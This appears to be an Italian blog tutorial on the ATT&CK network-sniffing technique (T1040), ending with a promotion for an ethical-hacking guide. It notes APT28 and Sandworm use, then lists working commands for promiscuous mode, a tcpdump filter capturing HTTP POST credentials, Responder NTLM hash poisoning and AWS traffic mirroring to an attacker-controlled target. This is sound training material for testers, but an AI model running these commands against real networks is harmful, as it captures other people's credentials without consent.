Intercettazione del Traffico: Network Sniffing (T1040)
Lo sniffing di rete rappresenta una tecnica di intercettazione passiva del traffico dati che transita attraverso le interfacce di rete. Gli attaccanti sfruttano questa metodologia per catturare credenziali in chiaro, configurazioni di sistema e altri dati sensibili che viaggiano sulla rete.
Questa tecnica si manifesta in due tattiche principali della kill chain: TA0006 (Credential Access) nella fase di escalation dei privilegi quando l'obiettivo è catturare credenziali, e TA0007 (Discovery) durante la ricognizione post-compromissione per mappare servizi e sistemi. La doppia natura rende lo sniffing particolarmente versatile.
Le statistiche mostrano un utilizzo significativo: 8 gruppi APT documentati, 16 software malevoli o tool legittimi weaponizzati, e 3 campagne di alto profilo. Tra i gruppi più attivi troviamo APT28 con l'uso di Wi-Fi pineapple per intercettare traffico wireless, e Sandworm Team che ha utilizzato intercepter-NG durante attacchi alle infrastrutture critiche.
L'evoluzione verso il cloud ha ampliato le possibilità di sniffing attraverso servizi nativi come AWS Traffic Mirroring e Azure vTAP, permettendo la cattura del traffico anche in ambienti virtualizzati.
Per testare la resilienza della rete contro attacchi di sniffing, iniziamo con l'attivazione della modalità promiscua su Linux:
sudo ip link set eth0 promisc on
Questo comando abilita la cattura di tutto il traffico che transita sull'interfaccia, non solo quello destinato al nostro host. Per verificare l'attivazione: ip link show eth0 mostrerà il flag PROMISC attivo.
La cattura vera e propria può essere effettuata con tcpdump filtrando le credenziali HTTP:
sudo tcpdump -i eth0 -A 'tcp port 80 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354)'
Questo comando intercetta richieste POST che spesso contengono credenziali. Per ambienti Windows, utilizziamo windump con sintassi simile o PowerShell per risultati più raffinati.
Responder rappresenta uno degli strumenti più efficaci per catturare hash NTLM attraverso poisoning dei protocolli di risoluzione nomi:
sudo responder -I eth0 -dwF
I flag attivano DHCP, WPAD e fingerprinting per massimizzare la cattura. Gli hash intercettati vengono salvati automaticamente nella directory logs/ per successive attività di cracking.
Per simulare l'approccio di APT28, configuriamo un Wi-Fi pineapple per intercettare traffico wireless. Il dispositivo crea un access point malevolo che si interpone tra client e rete legittima, catturando tutte le comunicazioni in transito.
In ambienti cloud AWS, testiamo la creazione di una sessione di traffic mirroring:
aws ec2 create-traffic-mirror-session --traffic-mirror-target-id tmt-12345 --network-interface-id eni-67890 --session-number 1
Questo comando replica il traffico di un'istanza EC2 verso un target controllato dall'attaccante per analisi offline.
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo